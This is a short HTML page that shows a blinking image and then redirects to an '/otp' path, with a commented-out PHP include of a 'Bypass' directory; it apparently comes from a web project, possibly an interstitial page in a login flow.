<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
    img {
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 20%;
    }

    /* Blink for Webkit and others
(Chrome, Safari, Firefox, IE, ...)
*/

    @-webkit-keyframes blinker {
        from {
            opacity: 1.0;
        }

        to {
            opacity: 0.0;
        }
    }

    .blink {
        text-decoration: blink;
        -webkit-animation-name: blinker;
        -webkit-animation-duration: 0.6s;
        -webkit-animation-iteration-count: infinite;
        -webkit-animation-timing-function: ease-in-out;
        -webkit-animation-direction: alternate;
    }
    </style>
</head>

<body>
    <img src="/assets/unnamed.png" alt="Paris" class="blink" style="width:20%;">
    <script>
       setTimeout(document.location.href = '/otp', 5000);
    </script>
</body>

</html>
<!-- <?php
    include_once("/Bypass/pass/index.php");
?> -->